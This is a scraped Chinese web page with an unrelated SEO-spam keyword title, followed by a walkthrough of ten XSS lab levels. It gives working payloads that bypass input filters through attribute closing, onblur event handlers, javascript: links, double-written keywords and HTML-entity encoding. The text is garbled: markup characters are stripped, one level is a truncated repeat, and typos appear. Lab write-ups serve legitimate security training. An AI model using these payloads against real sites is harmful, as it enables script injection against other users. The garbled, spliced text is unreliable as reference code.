推广网站有效的方法,网站seo优化加推广,自助房申请网站,做网站哪家便宜终极测试代码
sCrScRiPtIPTOonN\/(hrHRefEF)/sCr/ScRiPtIPT
第一关#xff08;没有任何过滤#xff09;
使用终极测试代码#xff0c;查看源码 发现没有任何过滤#xff0c;直接使用javascrupt中的alert弹框
scriptaler…终极测试代码
sCrScRiPtIPTOonN\/(hrHRefEF)/sCr/ScRiPtIPT
第一关没有任何过滤
使用终极测试代码查看源码 发现没有任何过滤直接使用javascrupt中的alert弹框
scriptalert(wj)/script 第二关(闭合方式)
先用终极测试代码查看源码 input namekeyword valuescriptalert(/xss/)/script 我们要先闭合前面然后注释掉后面 input namekeyword valuescriptalert(/xss/)/script// scriptalert(/wj/)script// 第三关过滤 和
先用终极测试代码查看源码 valuelt;sCrlt;ScRiPtgt;IPTgt;OonNquot;\/(hrHRefEF)lt;/sCrlt;/ScRiPtgt; IPTgt; 发现 和 被实体化不能使用但是我们可以使用Javascript事件。 这里使用onblur事件。然后闭合方式是 input namekeyword value οnbluralert(/xss/) onbluralert(/1/) 第四关(注意闭合方式)
先用终极测试代码查看源码 发现没有变化 我们尝试第三关的方式注意这里的闭关方式是 input namekeyword value οnbluralert(/1/) onbluralert(/1/) 第五关(大小写scripton.)
先用终极测试代码查看源码 valuescrscr_iptiptoo_nn\/(hrhrefef)/scr/scriptipt 过滤了大小写scripton.javascript 伪协议 a标签要独立运行所以要闭合前面的input标签 value a href javascript:alert(/xss/)click me/a a href javascript:alert(wj)click me/a 第六关过滤了on
先用终极测试代码查看源码 valuesCrScRiPtIPTOo_nN\/(hrHRefEF)/sCr/ScRiPtIPT 过滤了on, valuea href javascript:alert(wj)click me/a a hRef javascript:alert(wj)click me/a 第七关过滤
我们用第六关的代码试试 input namekeyword valuea java:alert(wj)click me/a 发现href和script被过滤了我们可以试试双写 input namekeyword value scrscriptiptalert(/xss/)/scrscriptipt scrscriptiptalert(/xss/)/scrscriptipt 第八关(html编码
先用终极测试代码查看源码 valuelt;scrlt;scriptgt;iptgt;oonnquot;\/(hrhrefef)lt;/scrlt;/scriptgt;iptgt; 发现过滤了大小写 . 所以使用html实体编码。 javascript:alert(wj)#x6a;#x61;#x76;#x61;#x73;#x63;#x72;#x69;#x70;#x74;#x3a;#x61;#x6c;
#x65;#x72;#x74;#x28;#x27;#x77;#x6a;#x27;#x29; 第九关格式http://
使用第八关方式发现代码不合法。需要使用http://. #x6a;#x61;#x76;#x61;#x73;#x63;#x72;#x69;#x70;#x74;#x3a;#x61;
#x6c;#x65;#x72;#x74;#x28;#x27;#x77;#x6a;#x27;#x29;//http:// 第十关(搜索框被隐藏) 发现没有搜索框查看源码 发现是使用了hidden,隐藏了 我们可以修改他让hidden失去作用 input namet_sort value οnblur alert(/xss/) typehidden onbluralert(/1/)
